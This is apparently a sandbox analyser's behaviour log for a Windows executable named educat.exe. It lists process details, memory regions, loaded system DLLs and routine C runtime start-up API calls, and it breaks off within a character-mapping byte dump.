# Flog Txt Version 1 # Analyzer Version: 2.3.2 # Analyzer Build Date: Oct 25 2018 12:55:11 # Log Creation Date: 06.11.2018 11:23:27.291 Process: id = "1" image_name = "educat.exe" filename = "c:\\users\\ciihmnxmn6ps\\desktop\\educat.exe" page_root = "0x5686b000" os_pid = "0xd50" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "analysis_target" parent_id = "0" os_parent_pid = "0x0" cmd_line = "\"C:\\Users\\CIiHmnxMn6Ps\\Desktop\\educat.exe\" " cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:00014ee5" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 2 start_va = 0x30000 end_va = 0x30fff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 3 start_va = 0x40000 end_va = 0x53fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 4 start_va = 0x60000 end_va = 0x9ffff entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 5 start_va = 0xa0000 end_va = 0x19ffff entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 6 start_va = 0x1a0000 end_va = 0x1a3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 7 start_va = 0x1b0000 end_va = 0x1b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8 start_va = 0x1c0000 end_va = 0x1c1fff entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 9 start_va = 0x400000 end_va = 0x512fff entry_point = 0x400000 region_type = mapped_file name = "educat.exe" filename = "\\Users\\CIiHmnxMn6Ps\\Desktop\\educat.exe" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\educat.exe") Region: id = 10 start_va = 0x77ca0000 end_va = 0x77e18fff entry_point = 0x77ca0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 11 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 12 start_va = 0x7ffdb000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdb000" filename = "" Region: id = 13 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 14 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 15 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 16 start_va = 0x7fff0000 end_va = 0x7ff8ee37ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 17 start_va = 0x7ff8ee380000 end_va = 0x7ff8ee541fff entry_point = 0x7ff8ee380000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 18 start_va = 0x7ff8ee542000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ff8ee542000" filename = "" Region: id = 158 start_va = 0x290000 end_va = 0x29ffff entry_point = 0x0 region_type = private name = "private_0x0000000000290000" filename = "" Region: id = 159 start_va = 0x64af0000 end_va = 0x64b62fff entry_point = 0x64af0000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 160 start_va = 0x64b70000 end_va = 0x64bbefff entry_point = 0x64b70000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 161 start_va = 0x64ae0000 end_va = 0x64ae7fff entry_point = 0x64ae0000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 162 start_va = 0x6b0000 end_va = 0x7affff entry_point = 0x0 region_type = private name = "private_0x00000000006b0000" filename = "" Region: id = 163 start_va = 0x74e70000 end_va = 0x74fe5fff entry_point = 0x74e70000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 164 start_va = 0x75260000 end_va = 0x7534ffff entry_point = 0x75260000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 165 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 166 start_va = 0x1d0000 end_va = 0x28dfff entry_point = 0x1d0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 167 start_va = 0x74ca0000 end_va = 0x74d30fff entry_point = 0x74ca0000 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\SysWOW64\\apphelp.dll" (normalized: "c:\\windows\\syswow64\\apphelp.dll") Region: id = 168 start_va = 0x7feb0000 end_va = 0x7ffaffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 169 start_va = 0x20000 end_va = 0x23fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 170 start_va = 0x2a0000 end_va = 0x2dffff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 171 start_va = 0x2e0000 end_va = 0x3dffff entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 172 start_va = 0x74b50000 end_va = 0x74be1fff entry_point = 0x74b50000 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10240.16384_none_49c02355cf03478c\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10240.16384_none_49c02355cf03478c\\comctl32.dll") Region: id = 173 start_va = 0x74bf0000 end_va = 0x74bf7fff entry_point = 0x74bf0000 region_type = mapped_file name = "version.dll" filename = "\\Windows\\SysWOW64\\version.dll" (normalized: "c:\\windows\\syswow64\\version.dll") Region: id = 174 start_va = 0x74d40000 end_va = 0x74d98fff entry_point = 0x74d40000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 175 start_va = 0x74da0000 end_va = 0x74da9fff entry_point = 0x74da0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 176 start_va = 0x74db0000 end_va = 0x74dcdfff entry_point = 0x74db0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 177 start_va = 0x753b0000 end_va = 0x753f3fff entry_point = 0x753b0000 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\SysWOW64\\powrprof.dll" (normalized: "c:\\windows\\syswow64\\powrprof.dll") Region: id = 178 start_va = 0x75430000 end_va = 0x767eefff entry_point = 0x75430000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 179 start_va = 0x76810000 end_va = 0x7681efff entry_point = 0x76810000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 180 start_va = 0x76a10000 end_va = 0x76a8afff entry_point = 0x76a10000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 181 start_va = 0x76c40000 end_va = 0x76c82fff entry_point = 0x76c40000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 182 start_va = 0x76d90000 end_va = 0x76e3bfff entry_point = 0x76d90000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 183 start_va = 0x76e40000 end_va = 0x76ff9fff entry_point = 0x76e40000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 184 start_va = 0x77000000 end_va = 0x7714cfff entry_point = 0x77000000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 185 start_va = 0x77150000 end_va = 0x7728ffff entry_point = 0x77150000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 186 start_va = 0x77290000 end_va = 0x772d3fff entry_point = 0x77290000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 187 start_va = 0x77340000 end_va = 0x773ccfff entry_point = 0x77340000 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll") Region: id = 188 start_va = 0x773f0000 end_va = 0x778ccfff entry_point = 0x773f0000 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\SysWOW64\\windows.storage.dll" (normalized: "c:\\windows\\syswow64\\windows.storage.dll") Region: id = 189 start_va = 0x779f0000 end_va = 0x77aadfff entry_point = 0x779f0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 190 start_va = 0x77c30000 end_va = 0x77c3bfff entry_point = 0x77c30000 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 191 start_va = 0x7ffd8000 end_va = 0x7ffdafff entry_point = 0x0 region_type = private name = "private_0x000000007ffd8000" filename = "" Region: id = 192 start_va = 0x520000 end_va = 0x6a7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000520000" filename = "" Region: id = 193 start_va = 0x800000 end_va = 0x80ffff entry_point = 0x0 region_type = private name = "private_0x0000000000800000" filename = "" Region: id = 194 start_va = 0x75400000 end_va = 0x7542afff entry_point = 0x75400000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 195 start_va = 0x778d0000 end_va = 0x779effff entry_point = 0x778d0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 196 start_va = 0x30000 end_va = 0x30fff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 197 start_va = 0x3e0000 end_va = 0x3e0fff entry_point = 0x0 region_type = private name = "private_0x00000000003e0000" filename = "" Region: id = 198 start_va = 0x7b0000 end_va = 0x7cffff entry_point = 0x0 region_type = private name = "private_0x00000000007b0000" filename = "" Region: id = 199 start_va = 0x810000 end_va = 0x990fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000810000" filename = "" Region: id = 200 start_va = 0x9a0000 end_va = 0x1d9ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000009a0000" filename = "" Region: id = 201 start_va = 0x1f20000 end_va = 0x1f2ffff entry_point = 0x0 region_type = private name = "private_0x0000000001f20000" filename = "" Region: id = 202 start_va = 0x1da0000 end_va = 0x1e50fff entry_point = 0x0 region_type = private name = "private_0x0000000001da0000" filename = "" Region: id = 203 start_va = 0x1e60000 end_va = 0x1ecefff entry_point = 0x0 region_type = private name = "private_0x0000000001e60000" filename = "" Region: id = 204 start_va = 0x3f0000 end_va = 0x3f1fff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 223 start_va = 0x1f30000 end_va = 0x20a6fff entry_point = 0x0 region_type = private name = "private_0x0000000001f30000" filename = "" Region: id = 224 start_va = 0x20b0000 end_va = 0x2228fff entry_point = 0x0 region_type = private name = "private_0x00000000020b0000" filename = "" Region: id = 225 start_va = 0x1f30000 end_va = 0x20a6fff entry_point = 0x0 region_type = private name = "private_0x0000000001f30000" filename = "" Region: id = 226 start_va = 0x20b0000 end_va = 0x2228fff entry_point = 0x0 region_type = private name = "private_0x00000000020b0000" filename = "" Region: id = 227 start_va = 0x1f30000 end_va = 0x20a6fff entry_point = 0x0 region_type = private name = "private_0x0000000001f30000" filename = "" Region: id = 228 start_va = 0x20b0000 end_va = 0x2228fff entry_point = 0x0 region_type = private name = "private_0x00000000020b0000" filename = "" Region: id = 230 start_va = 0x1f30000 end_va = 0x20a6fff entry_point = 0x0 region_type = private name = "private_0x0000000001f30000" filename = "" Region: id = 231 start_va = 0x20b0000 end_va = 0x2228fff entry_point = 0x0 region_type = private name = "private_0x00000000020b0000" filename = "" Region: id = 232 start_va = 0x1f30000 end_va = 0x1fa0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001f30000" filename = "" Region: id = 233 start_va = 0x1fb0000 end_va = 0x2126fff entry_point = 0x0 region_type = private name = "private_0x0000000001fb0000" filename = "" Region: id = 234 start_va = 0x2130000 end_va = 0x22a8fff entry_point = 0x0 region_type = private name = "private_0x0000000002130000" filename = "" Region: id = 235 start_va = 0x1fb0000 end_va = 0x2126fff entry_point = 0x0 region_type = private name = "private_0x0000000001fb0000" filename = "" Region: id = 236 start_va = 0x2130000 end_va = 0x22a8fff entry_point = 0x0 region_type = private name = "private_0x0000000002130000" filename = "" Region: id = 271 start_va = 0x1fb0000 end_va = 0x2126fff entry_point = 0x0 region_type = private name = "private_0x0000000001fb0000" filename = "" Region: id = 283 start_va = 0x2130000 end_va = 0x22a8fff entry_point = 0x0 region_type = private name = "private_0x0000000002130000" filename = "" Thread: id = 1 os_tid = 0xd54 [0044.563] GetStartupInfoW (in: lpStartupInfo=0x19ff18 | out: lpStartupInfo=0x19ff18*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\educat.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x401, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x10001, hStdError=0x0)) [0044.563] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0044.564] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x75260000 [0044.565] GetProcAddress (hModule=0x75260000, lpProcName="FlsAlloc") returned 0x7527a330 [0044.565] GetProcAddress (hModule=0x75260000, lpProcName="FlsGetValue") returned 0x75277580 [0044.565] GetProcAddress (hModule=0x75260000, lpProcName="FlsSetValue") returned 0x75279910 [0044.565] GetProcAddress (hModule=0x75260000, lpProcName="FlsFree") returned 0x7527f400 [0044.566] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x75260000 [0044.566] GetCurrentThreadId () returned 0xd54 [0044.566] GetStartupInfoW (in: lpStartupInfo=0x19feb4 | out: lpStartupInfo=0x19feb4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\educat.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x401, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x10001, hStdError=0x0)) [0044.566] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0044.566] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0044.566] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0044.566] SetHandleCount (uNumber=0x20) returned 0x20 [0044.566] GetCommandLineA () returned="\"C:\\Users\\CIiHmnxMn6Ps\\Desktop\\educat.exe\" " [0044.566] GetEnvironmentStringsW () returned 0x6c9ce8* [0044.566] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1331, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1331 [0044.567] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1331, lpMultiByteStr=0x7c0fd0, cbMultiByte=1331, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 1331 [0044.567] FreeEnvironmentStringsW (penv=0x6c9ce8) returned 1 [0044.567] GetLastError () returned 0xcb [0044.567] SetLastError (dwErrCode=0xcb) [0044.567] GetLastError () returned 0xcb [0044.567] SetLastError (dwErrCode=0xcb) [0044.567] GetLastError () returned 0xcb [0044.567] SetLastError (dwErrCode=0xcb) [0044.567] GetACP () returned 0x4e4 [0044.567] GetLastError () returned 0xcb [0044.567] SetLastError (dwErrCode=0xcb) [0044.567] IsValidCodePage (CodePage=0x4e4) returned 1 [0044.567] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x19fe7c | out: lpCPInfo=0x19fe7c) returned 1 [0044.567] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x19f948 | out: lpCPInfo=0x19f948) returned 1 [0044.567] GetLastError () returned 0xcb [0044.567] SetLastError (dwErrCode=0xcb) [0044.567] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fd5c, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0044.567] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fd5c, cbMultiByte=256, lpWideCharStr=0x19f6c8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿﴟ@Ā") returned 256 [0044.567] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿﴟ@Ā", cchSrc=256, lpCharType=0x19f95c | out: lpCharType=0x19f95c) returned 1 [0044.567] GetLastError () returned 0xcb [0044.567] SetLastError (dwErrCode=0xcb) [0044.568] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fd5c, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0044.568] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fd5c, cbMultiByte=256, lpWideCharStr=0x19f698, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0044.568] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0044.568] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x19f488, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿЀ") returned 256 [0044.568] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿЀ", cchWideChar=256, lpMultiByteStr=0x19fc5c, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\xff\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xd7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd